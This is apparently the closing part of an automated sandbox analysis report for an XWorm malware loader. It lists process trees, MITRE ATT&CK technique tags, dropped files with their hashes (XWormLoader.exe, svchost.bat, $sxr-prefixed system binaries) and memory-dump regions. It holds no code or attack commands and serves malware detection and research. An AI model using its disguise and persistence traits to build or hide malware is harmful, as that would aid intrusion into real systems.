1⤵
PID:3096

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc
1⤵
PID:1864

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k WerSvcGroup
1⤵
PID:3328
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 2480 -ip 2480
  2⤵
  PID:4072
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 232 -p 2604 -ip 2604
  2⤵
  PID:4636

C:\Windows\System32\smartscreen.exe
C:\Windows\System32\smartscreen.exe -Embedding
1⤵
PID:3720

C:\Windows\System32\mousocoreworker.exe
C:\Windows\System32\mousocoreworker.exe -Embedding
1⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:5708

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Hide Artifacts

T1564

Hidden Window

T1564.003

Impair Defenses

T1562

Safe Mode Boot

T1562.009

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\XWormLoader.exe.log

Filesize
654B

MD5
11c6e74f0561678d2cf7fc075a6cc00c

SHA1
535ee79ba978554abcb98c566235805e7ea18490

SHA256
d39a78fabca39532fcb85ce908781a75132e1bd01cc50a3b290dd87127837d63

SHA512
32c63d67bf512b42e7f57f71287b354200126cb417ef9d869c72e0b9388a7c2f5e3b61f303f1353baa1bf482d0f17e06e23c9f50b2f1babd4d958b6da19c40b0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
54KB

MD5
2f7b8a2467120758d033dd57f155aef1

SHA1
ea013573e4b88c5877a468f61736086215e8e417

SHA256
24eaf54e2317aca4e1029b7955660abd05bfe0b9e0a80b3c09914efe0625bda7

SHA512
a77eb5be2e292476c9382976766649a2e4b6530893cc120e7b6f8b35ae4883f34ed3372445a73fa54ab08e2e94498b4116d83e6baf111d7ef775a1d3623f801c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
2KB

MD5
d54ae8b8e245eb1def5451f549c36c14

SHA1
87a2fe8f9f179f229b33ee85b0b89662309b0031

SHA256
cac07e1a0875e75d34b4fc3cb9fdb76f89f5fff9e394f0bca8da3bbf8a1c117e

SHA512
b5197968c9dc38b0e1ad3923c154bdf68de5629877ac7299e11c661d33631b10adfdccad0aaf7151cbbb8e1fa4f40cbe2632483aa53443d3391c8423f6ebbaa0

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zO02008318\XWormLoader.exe

Filesize
8.6MB

MD5
2aff4d1edefd1017408f77bbf15ef6c2

SHA1
cfc1827c2e45802cbfe931ab66dea427c512a6ab

SHA256
7de8a4b7288fe71fdb8fa2eb453059937ce5ff998e117dc79c8d68de7e0f9315

SHA512
a456dba519592187461596f0ceb1e008e0a9a974a79698acda5bb1cfe000b99fd1bcafe140a022a40db6b447cb70e335dba137500a4f05e68299a3da758f9756

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zO020686D7\Fixer.bat

Filesize
122B

MD5
2dabc46ce85aaff29f22cd74ec074f86

SHA1
208ae3e48d67b94cc8be7bbfd9341d373fa8a730

SHA256
a11703fd47d16020fa099a95bb4e46247d32cf8821dc1826e77a971cdd3c4c55

SHA512
6a50b525bc5d8eb008b1b0d704f9942f72f1413e65751e3de83d2e16ef3cf02ef171b9da3fff0d2d92a81daac7f61b379fcf7a393f46e914435f6261965a53b3

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zO020F4C18\XWorm V5.0.exe

Filesize
10.4MB

MD5
227494b22a4ee99f48a269c362fd5f19

SHA1
d32d08cf93d7f9450aee7e1e6c39d9d83b9a35c9

SHA256
7471ff7818da2e044caf5bd89725b6283ed0304453c18a0490d6341f3a010ca2

SHA512
71070e6b8042fa262ce12721e6c09104aec0a61ac0d6022f59f838077109b9476a5c1f8409242d93888eff6d36f0ee76337481fefe6f05e0f1243efbf350bee0

Download Submit
C:\Users\Admin\AppData\Local\Temp\CE8806DA1EF0F1BB553DFF4FC5E9FCCD\CE8806DA1EF0F1BB553DFF4FC5E9FCCD.dll

Filesize
112KB

MD5
a239b7cac8be034a23e7e231d3bcc6df

SHA1
ae3c239a17c2b4b4d2fba1ec862cf9644bf1346d

SHA256
063099408fd5fb10a7ea408a50b7fb5da1c36accc03b9b31c933df54385d32b8

SHA512
c79a2b08f7e95d49a588b1f41368f0dd8d4cd431ad3403301e4d30826d3df0907d01b28ef83116ad6f035218f06dbdf63a0f4f2f9130bba1b0b7e58f9fc67524

Download Submit
C:\Users\Admin\AppData\Local\Temp\XWormLoader.exe

Filesize
101KB

MD5
39d81ca537ceb52632fbb2e975c3ee2f

SHA1
0a3814bd3ccea28b144983daab277d72313524e4

SHA256
76c4d61afdebf279316b40e1ca3c56996b16d760aa080d3121d6982f0e61d8e7

SHA512
18f7acf9e7b992e95f06ab1c96f017a6e7acde36c1e7c1ff254853a1bfcde65abcdaa797b36071b9349e83aa2c0a45c6dfb2d637c153b53c66fc92066f6d4f9a

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ycxawefp.zz2.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\svchost.bat

Filesize
11.9MB

MD5
2892f2caa15e37c12faea09c6bb5a44a

SHA1
8f401732b8a3a8b1022ef52836a4e7eac604146a

SHA256
c5ece24bcd43419cf718605925b565c17bc668ab7d3801a1d923465b15bd9f1f

SHA512
35abceb95d61ba4bfb6facc9559fe4d2db3eec9810bff4230c697864e0bd37e58ec1c1d817a766cfc07b12bed0dfedecfab01179f7295d1118347ba432ee996d

Download Submit
C:\Windows\$sxr-cmd.exe

Filesize
283KB

MD5
2b40c98ed0f7a1d3b091a3e8353132dc

SHA1
df79c86fdd11b9ccb89148458e509f879c72566c

SHA256
badf4752413cb0cbdc03fb95820ca167f0cdc63b597ccdb5ef43111180e088b0

SHA512
80919a638e41547a4061ae1c9b1aeda2d2e4b3b5f0f22b9b5a1e9102d873b17ac2eaf99df02486c72b6a84dd6f7ba87b94ffccc6f8c34e271a6aea25099edc33

Download Submit
C:\Windows\$sxr-mshta.exe

Filesize
42KB

MD5
86f05e66502036db5b678b917e5d5b17

SHA1
18b5612d05fb0cf28e4976f6b51abc7462bbaf3b

SHA256
b6d1162285423aa7c623fc89492f2f1195de110f054c912f264e29644d65647f

SHA512
be192089c13c8a5aa9322a3da86aef2d987e274911b5526a8a2d8db5c92e717a4dcf0c16c1d69d95a173d5f90ae5569ef2b9ee7836992ef82a938efb62239ab4

Download Submit
C:\Windows\$sxr-powershell.exe

Filesize
445KB

MD5
2e5a8590cf6848968fc23de3fa1e25f1

SHA1
801262e122db6a2e758962896f260b55bbd0136a

SHA256
9785001b0dcf755eddb8af294a373c0b87b2498660f724e76c4d53f9c217c7a3

SHA512
5c5ca5a497f39b07c7599194512a112b05bba8d9777bee1cb45bf610483edbffff5f9132fee3673e46cf58f2c3ba21af7df13c273a837a565323b82a7b50a4d8

Download Submit
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work

Filesize
3KB

MD5
4838ee953dab2c7a1bf57e0c6620a79d

SHA1
8c39cd200f9ffa77739ff686036d0449984f1323

SHA256
22c798e00c4793749eac39cfb6ea3dd75112fd4453a3706e839038a64504d45d

SHA512
066782b16e6e580e2861013c530d22d62c5ba0f217428cc0228ad45b855e979a86d2d04f553f3751cf7d063c6863cb7ea9c86807e7f89c7e0ae12481af65af76

Download Submit
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work

Filesize
3KB

MD5
8e64ab95d5d2c4c1e7a757624cb1fffa

SHA1
9889f93ad60bacb07683b4a23c40aa32954646d8

SHA256
dff8902430dcae2fba05fc7f54157c4bc8a7445ed488c1d5727947a0c07075d6

SHA512
3ecc166686c1d7d61e91ec972244118980bf626a88123b87136695ac206e159933ad9f9feb3fd565713dd5d99038f427b845637c51a57497f0ac716de3a7973c

Download Submit
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work

Filesize
3KB

MD5
c6086d02f8ce044f5fa07a98303dc7eb

SHA1
6116247e9d098b276b476c9f4c434f55d469129c

SHA256
8901d9c9aea465da4ea7aa874610a90b8cf0a71eba0e321cf9675fceee0b54a0

SHA512
1876d8fc1a8ac83aadb725100ea7a1791bd62d4d0edc1b78802e0bffe458f309a66dc97e1b9da60dd52b8cb80bf471ccb5f8480e6192c9eb2a13eac36462d27a

Download Submit
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work

Filesize
3KB

MD5
39b9eb9d1a56bc1792c844c425bd1dec

SHA1
db5a91082fa14eeb6550cbc994d34ebd95341df9

SHA256
acade97e8a1d30477d0dc3fdfea70c2c617c369b56115ec708ed8a2cfdbc3692

SHA512
255b1c1c456b20e6e3415540ef8af58e723f965d1fa782da44a6bbc81b43d8a31c5681777ba885f91ed2dae480bc2a4023e01fe2986857b13323f0459520eb51

Download Submit
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work

Filesize
2KB

MD5
4ac1741ceb19f5a983079b2c5f344f5d

SHA1
f1ebd93fbade2e035cd59e970787b8042cdd0f3b

SHA256
7df73f71214cdd2f2d477d6c2c65f6e4c2f5955fc669cde9c583b0ff9553ecdc

SHA512
583706069a7c0b22926fa22fc7bedcca9d6750d1542a1125b688fbb0595baf6cefc76e7b6e49c1415c782a21d0dd504c78fa36efad5f29f2fd5d69cc45ad8dcd

Download Submit
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work

Filesize
2KB

MD5
a9124c4c97cba8a07a8204fac1696c8e

SHA1
1f27d80280e03762c7b16781608786f5a98ff434

SHA256
8ad3d28aeff847bc5fb8035cbc7c71e88a4ee547821a8e1a3ea6661ee6014b21

SHA512
537caaa75ac1e257c6b247f9680c3b9e79156ea1bcb3f1326e969a774db33b3c906800813ca6f79369c799a62f4260c91c6dd9a6cace3af25b7dbea5a73e0392

Download Submit
C:\Windows\System32\perfc007.dat

Filesize
44KB

MD5
bc3d1639f16cb93350a76b95cd59108b

SHA1
47f1067b694967d71af236d5e33d31cb99741f4c

SHA256
004818827ecc581f75674919f4605d28eed27e3f2229ae051d6849129eef40e9

SHA512
fe44f3dbd009d932491af26c3615e616bc0042741dc3815ffb4d2b8d201efd8ab89f7cdd747406609393f005a596a6e9ea8e3f231bc150dc406c2adb8f806249

Download Submit
C:\Windows\System32\perfc00A.dat

Filesize
47KB

MD5
69c02ba10f3f430568e00bcb54ddf5a9

SHA1
8b95d298633e37c42ea5f96ac08d950973d6ee9d

SHA256
62e5660f9018da67d3c6727c39e9690650beb62749df0b4c00e6085f36c8e94e

SHA512
16e4d29324c2b50e1347532cd0982a149a7c67c4f27a743bbad8609ac662c3e00fa1be645b1b5f23adca3abd60c812f3f87d669f5ffb42b90ca5026dcbf2824e

Download Submit
C:\Windows\System32\perfc00C.dat

Filesize
43KB

MD5
8b4b53cf469919a32481ce37bcce203a

SHA1
58ee96630adf29e79771bfc39a400a486b4efbb0

SHA256
a7b3a2b6c67e98cf2b13684c8774113c4ed4f60cd6fc673d4c9dcb360c60ce42

SHA512
62217e68c9e4c7b077e127040318c603e2f2cbcc5517ce0cfc6189e43023f8d8a05b8e694b2a35d4b409241136a1067749b7b6e2049d6910246d8c0fa6e9e575

Download Submit
C:\Windows\System32\perfc010.dat

Filesize
42KB

MD5
bea0a3b9b4dc8d06303d3d2f65f78b82

SHA1
361df606ee1c66a0b394716ba7253d9785a87024

SHA256
e88439ae381e57e207ce09bbf369859c34b239b08124339534dcc935a89ac927

SHA512
341132d443cd41acf0a7eaee0d6883c40d8a4db8c59e056211e898c817c2847377f0208ed3a40e0fd6f73f0196ffcc680c55754e160edafd97036739861a6c88

Download Submit
C:\Windows\System32\perfc011.dat

Filesize
32KB

MD5
50681b748a019d0096b5df4ebe1eab74

SHA1
0fa741b445f16f05a1984813c7b07cc66097e180

SHA256
33295c7ee1b56a41e809432bc25dd745ba55b2dc91bfa97aa1f55156880cd71a

SHA512
568439b3547dcbcce28499d45663fdd0e2222f6c5c90053769ce2585f65721f679c071393328bde72c9a3f03da4c17abb84b8303897688b59598887ceb31438e

Download Submit
C:\Windows\System32\perfh007.dat

Filesize
307KB

MD5
312d855b1d95ae830e067657cffdd28c

SHA1
8133c02adeae24916fa9c53e52b3bfe66ac3d5a3

SHA256
ca3f8056e3e2378509ab24f8b8471e5fccac403a5413be518ac35bbb42a2e2cf

SHA512
f25c1a81a582a2a5e3142bd97f425c6ee5c26f878b1155232002fff1e4a3528bc371fb962da256c281e05c6c537160a4f48e00ea1fcf3e9887097f8ca6ec2b14

Download Submit
C:\Windows\System32\perfh009.dat

Filesize
297KB

MD5
50362589add3f92e63c918a06d664416

SHA1
e1f96e10fb0f9d3bec9ea89f07f97811ccc78182

SHA256
9a60acb9d0cb67b40154feb3ff45119f122301ee059798c87a02cc0c23e2ffce

SHA512
e21404bc7a5708ab1f4bd1df5baff4302bc31ac894d0940a38b8967b40aac46c2b3e51566d6410e66c4e867e1d8a88489adccf8bdcaec682e9ddabc0dac64468

Download Submit
C:\Windows\System32\perfh00A.dat

Filesize
347KB

MD5
49032045f6bcb9f676c7437df76c7ffa

SHA1
f1bf3ba149cd1e581fe12fb06e93d512fe3a241b

SHA256
089f30c1e60f038627531d486659fab66a8b927d65e4eca18f104d6ae4c7f641

SHA512
55b459b7787e6efacdcc17adb830dc3172a316ff8dd3b14a51bf4496a9479f513ae279a839674b472c1424170ee4aa63a5d45fc7fbd38a533a885282858c74f1

Download Submit
C:\Windows\System32\perfh00C.dat

Filesize
363KB

MD5
d0a8d13996333367f0e1721ca8658e00

SHA1
f48f432c5a0d3c425961e6ed6291ddb0f4b5a116

SHA256
68a7924621a0fbc13d0ea151617d13732a991cef944aae67d44fc030740a82e9

SHA512
8a68c62b5fc983975d010ae6504a1cbfdf34d5656e3277d9a09eb92929e201e27ca7bd2030740c8240a4afd56af57c223b4fd6de193bedf84ac7238777310de4

Download Submit
C:\Windows\System32\perfh010.dat

Filesize
333KB

MD5
70ac53e2ebbd863ff7f319d68aed16f7

SHA1
90109a5028b07e8aa36846fe5096e04bd97839d6

SHA256
a4e35710b8277d733eec1c165459f85d9660fbe264ccabe0a624626e93763e37

SHA512
8fc6d4c665a642e86acfffa35ce6c6d7bf49c1a414de8b15fb5cda8d121f4d671914aafe0625ad11e87fd74f0bba2d40b9a71f373d1ae67a12b238b023682af1

Download Submit
C:\Windows\System32\perfh011.dat

Filesize
145KB

MD5
f4f62aa4c479d68f2b43f81261ffd4e3

SHA1
6fa9ff1dbb2c6983afc3d57b699bc1a9d9418daa

SHA256
c2f81f06c86bf118a97fba7772d20d2c4ba92944551cd14e9d9bab40bf22816c

SHA512
cbd94b41fc3136c05981e880e1f854a5847a18708459112ca7eb0bdcb04d0034c42af8c58501a21ae56e07a29751236af9735b0a4ded3a6b0ef57d717acd5ff3

Download Submit
C:\Windows\system32\perfc007.dat

Filesize
49KB

MD5
6d74451159baa381e1d50a1715a8b2b7

SHA1
55fac3be0e963470abe2b52af057533c5e44fa55

SHA256
a557cea07dd52f74828ca151a4cd8017cc1e3b3ea4317cb6cd26045b12f14f1f

SHA512
75bcec32a35eecf88298d09fffc7a2fc77bc7159ff9a287d39087fa42c9a6e2e7959f9a30ea1bf78b7e79eab0bf3dc0d95e4ca6d225f50b6700206ac4bf9074a

Download Submit
C:\Windows\system32\perfc009.dat

Filesize
32KB

MD5
1e60bc5e525063b96078df17fbd3c4e1

SHA1
bae8eda409cb3e016ddd420c6354aeaac2d267b9

SHA256
a0894847ca6208cf7e519d8e825458596bbcd78156a453e32872de7592ea20d8

SHA512
5758d535e4ce20cc30b9b57fea1811feffb2655ecc6eec69c942defb4b4f8c06e8e37860f85ec7cad26df9d7635ecaf131a68ec4ee291aa36e448c7ef2339652

Download Submit
C:\Windows\system32\perfc00A.dat

Filesize
52KB

MD5
158fc80c907cec7ab404ce5a5ae82d05

SHA1
89d4365c7bbab17ad80dff966be54b0abbd76400

SHA256
47f8788873e3d5f2e98ccbca03312b3b585c40a066d7a6563cd3d232dc7747e7

SHA512
20f1cc39ddfe1414047f6378955de0f5d092c8d96a90d3a67c14a05c839ec2e69f5af0450c5519cffd0d411fb74f7f396d60bfc43cdbdb94ecf3c3498f9529ea

Download Submit
C:\Windows\system32\perfc00C.dat

Filesize
48KB

MD5
df62bf8165103360f015540a0cdc0386

SHA1
86e111d10a7e09eda4f6e4c59518266eec188b4d

SHA256
669f80582ffff555a5c732acfdeb413798ab2655b7941d175c205b7b1968942f

SHA512
655e341a51bb4e035d76c3f6fb195c99a9f4c11fc9b4bd072e6e34896c745c969de9045ab21050f651cbd815f7a8624b20ec69a0e355368b74d589cba0574ec6

Download Submit
C:\Windows\system32\perfc010.dat

Filesize
47KB

MD5
4aed25f24099a0eea85d6c4ee06a6aeb

SHA1
cbeaf05e397cd9c86615b3141c7d47812e7a1044

SHA256
37bfde70f0c745112c6dc3198e1c113d5cb54963684299f0c0a1db63c75d0c50

SHA512
2192b5ce7b8ee90d056ca42c0b8e625d2cd295419a9a138108bdff18eed3f2460963a49bf1b9933911151f39d725b8cd41e1c61e37f14c7228f96e2062bfe12c

Download Submit
C:\Windows\system32\perfc011.dat

Filesize
40KB

MD5
c4cf397bc6233f21d0f8f4e3739f0127

SHA1
6963c2cb9800be0f3da1adbf1ea6f25a606631eb

SHA256
be6f2bb247fa831e957fd18ec7073914b366cb00953bc55702e78cb9c0cf3366

SHA512
d082b95fc22284d290a920d3b69e74937b607763c5b833580ba37317088c38d8b3700ce0f858f09fab014e4dbba3ce49d6ee7659dd33f9d5da05c125e8510907

Download Submit
C:\Windows\system32\perfh007.dat

Filesize
322KB

MD5
8e549f070ac8bb646d0c34569ad6d880

SHA1
2a9bd2f7378ef5e85831cf590d9d735e9645f49e

SHA256
b08ebaa7d8ba93702ba84a59f41c0faed94273203d353c4f3cad31530d1b3751

SHA512
10c3a012dc64fdcb5bb0d8fe03aa771b936e78092de33e029658ad18e8c4771cddb84e6057b79bf8e6e90a8f3972f4bb1cad16f3cc96c13527289f3477f5fbd5

Download Submit
C:\Windows\system32\perfh009.dat

Filesize
316KB

MD5
74c911250cc9f3fb6e733bf7f7e29c5a

SHA1
f48caf8ad10ad5564467520e49b74235c9144461

SHA256
9d9b5cd5410c856b152b1520023b9f5f5d3effa6aec9f189506c7b6d5a0cd7cb

SHA512
5ec18156754bca22a61c35c4d513573c0c548234310a53e2879dd9565562b1835d7de16cee236e7000dcc180ce1e9103e2762fc39911f07055c6ea3a042c2a72

Download Submit
C:\Windows\system32\perfh00A.dat

Filesize
376KB

MD5
b5d7b8b38f84faa382610076c3c1bbe3

SHA1
5381607496ac10e46a872540f00d2d21ff9f3c4a

SHA256
6e0cbe7984e5368ce065f043842f76e7a8bf88f798e5d01e130ef16328d1ef52

SHA512
903dbd18283a748c47000214e114ceb6799f25acd6a2c122b9e9bf62c8e33f2adba2461c8f4bc62016de01b106fabbb28cb22db3e3bcd2c49fb2da616115e28e

Download Submit
C:\Windows\system32\perfh010.dat

Filesize
370KB

MD5
e53e65cd2ef78da6a3b461b517830b67

SHA1
579a3bded483b40f3779bb480fe7d004123cd0ef

SHA256
ebe76c216dc07054af8091ac8292208c40abb9899d6733932baa06b2ff12c877

SHA512
6655fc1676ae879724b981fe9580e298f87b2a08ea92234532f2f11d58727b84660e16cfbcdf82931693805b6d4135e302b71b49efd9c03f0c6559b14293e54e

Download Submit
C:\Windows\system32\perfh011.dat

Filesize
159KB

MD5
394e68a48cbedf2aa4290ad4be6c1254

SHA1
e9b5a4204bedd201adfee94cd4bd475f92d508a0

SHA256
48dbdc9f160e51c14f7cf0f4f31856fc5c51bb5a157eefc9159612227def9d88

SHA512
5b3ebefb252a4ea2b5504fdb79fba35f256ee544df6385eeb47a05be4eddd41063fe9a025d5e8393d34cc34abd431810b5c5cc21c777316200c9cfa769fcfd6c

Download Submit
memory/344-2086-0x00007FF8EA830000-0x00007FF8EA840000-memory.dmp

Filesize
64KB

Download
memory/444-1008-0x00007FF90B370000-0x00007FF90BE32000-memory.dmp

Filesize
10.8MB

Download
memory/444-982-0x0000029B29D80000-0x0000029B2A7F2000-memory.dmp

Filesize
10.4MB

Download
memory/444-981-0x00007FF90B373000-0x00007FF90B375000-memory.dmp

Filesize
8KB

Download
memory/444-990-0x00007FF90B370000-0x00007FF90BE32000-memory.dmp

Filesize
10.8MB

Download
memory/444-1007-0x0000029B454E0000-0x0000029B46096000-memory.dmp

Filesize
11.7MB

Download
memory/456-2092-0x00007FF8EA830000-0x00007FF8EA840000-memory.dmp

Filesize
64KB

Download
memory/472-2089-0x00007FF8EA830000-0x00007FF8EA840000-memory.dmp

Filesize
64KB

Download
memory/596-2098-0x00007FF8EA830000-0x00007FF8EA840000-memory.dmp

Filesize
64KB

Download
memory/632-2076-0x0000017321A90000-0x0000017321B30000-memory.dmp

Filesize
640KB

Download
memory/632-2077-0x00007FF8EA830000-0x00007FF8EA840000-memory.dmp

Filesize
64KB

Download
memory/684-2080-0x00007FF8EA830000-0x00007FF8EA840000-memory.dmp

Filesize
64KB

Download
memory/884-2095-0x00007FF8EA830000-0x00007FF8EA840000-memory.dmp

Filesize
64KB

Download
memory/964-2083-0x00007FF8EA830000-0x00007FF8EA840000-memory.dmp

Filesize
64KB

Download
memory/1108-2101-0x00007FF8EA830000-0x00007FF8EA840000-memory.dmp

Filesize
64KB

Download
memory/1168-2104-0x00007FF8EA830000-0x00007FF8EA840000-memory.dmp

Filesize
64KB

Download
memory/1244-2107-0x00007FF8EA830000-0x00007FF8EA840000-memory.dmp

Filesize
64KB

Download
memory/1300-2110-0x00007FF8EA830000-0x00007FF8EA840000-memory.dmp

Filesize
64KB

Download
memory/1320-2113-0x00007FF8EA830000-0x00007FF8EA840000-memory.dmp

Filesize
64KB

Download
memory/1352-2116-0x00007FF8EA830000-0x00007FF8EA840000-memory.dmp

Filesize
64KB

Download
memory/2132-1006-0x0000000000B50000-0x00000000013E6000-memory.dmp

Filesize
8.6MB

Download
memory/2352-2289-0x00000249E2B30000-0x00000249E2B80000-memory.dmp

Filesize
320KB

Download
memory/2352-2059-0x00000249E10D0000-0x00000249E168E000-memory.dmp

Filesize
5.7MB

Download
memory/2352-2067-0x00000249E23B0000-0x00000249E249C000-memory.dmp

Filesize
944KB

Download
memory/2352-2068-0x00000249E24A0000-0x00000249E2566000-memory.dmp

Filesize
792KB

Download
memory/2352-2073-0x0000000180000000-0x0000000180009000-memory.dmp

Filesize
36KB

Download
memory/2352-2057-0x00007FF929570000-0x00007FF92962D000-memory.dmp

Filesize
756KB

Download
memory/2352-2056-0x00000249E07C0000-0x00000249E0DD0000-memory.dmp

Filesize
6.1MB

Download
memory/2352-2062-0x00000249E1E90000-0x00000249E22FC000-memory.dmp

Filesize
4.4MB

Download
memory/2352-2060-0x00000249E1690000-0x00000249E1E8A000-memory.dmp

Filesize
8.0MB

Download
memory/2352-2063-0x00000249E2300000-0x00000249E23B2000-memory.dmp

Filesize
712KB

Download
memory/2352-2298-0x00000249E3670000-0x00000249E36AC000-memory.dmp

Filesize
240KB

Download
memory/2352-2294-0x00000249E39C0000-0x00000249E3B82000-memory.dmp

Filesize
1.8MB

Download
memory/2352-2291-0x00000249E3730000-0x00000249E37E2000-memory.dmp

Filesize
712KB

Download
memory/2352-2058-0x00007FF92A7B0000-0x00007FF92A9A8000-memory.dmp

Filesize
2.0MB

Download
memory/2368-1102-0x00007FF92A7B0000-0x00007FF92A9A8000-memory.dmp

Filesize
2.0MB

Download
memory/2368-1101-0x00007FF929570000-0x00007FF92962D000-memory.dmp

Filesize
756KB

Download
memory/2480-1046-0x0000000000810000-0x000000000082E000-memory.dmp

Filesize
120KB

Download
memory/3312-1065-0x00000282FF290000-0x00000282FF2D4000-memory.dmp

Filesize
272KB

Download
memory/3312-1098-0x000002829B4C0000-0x000002829B512000-memory.dmp

Filesize
328KB

Download
memory/3312-1097-0x000002829B420000-0x000002829B4BA000-memory.dmp

Filesize
616KB

Download
memory/3312-1096-0x000002829A940000-0x000002829B40A000-memory.dmp

Filesize
10.8MB

Download
memory/3312-1078-0x00007FF92A7B0000-0x00007FF92A9A8000-memory.dmp

Filesize
2.0MB

Download
memory/3312-1077-0x00007FF929570000-0x00007FF92962D000-memory.dmp

Filesize
756KB

Download
memory/3312-1076-0x00000282D2AA0000-0x00000282D3338000-memory.dmp

Filesize
8.6MB

Download
memory/3312-1099-0x000002829B510000-0x000002829B568000-memory.dmp

Filesize
352KB

Download
memory/3312-1106-0x000002829B5C0000-0x000002829B5C8000-memory.dmp

Filesize
32KB

Download
memory/3312-1066-0x00000282FF2E0000-0x00000282FF356000-memory.dmp

Filesize
472KB

Download
memory/3312-1107-0x0000000180000000-0x0000000180009000-memory.dmp

Filesize
36KB

Download
memory/3312-1100-0x000002829B570000-0x000002829B59E000-memory.dmp

Filesize
184KB

Download
memory/3312-1061-0x00000282FF0C0000-0x00000282FF0E2000-memory.dmp

Filesize
136KB

Download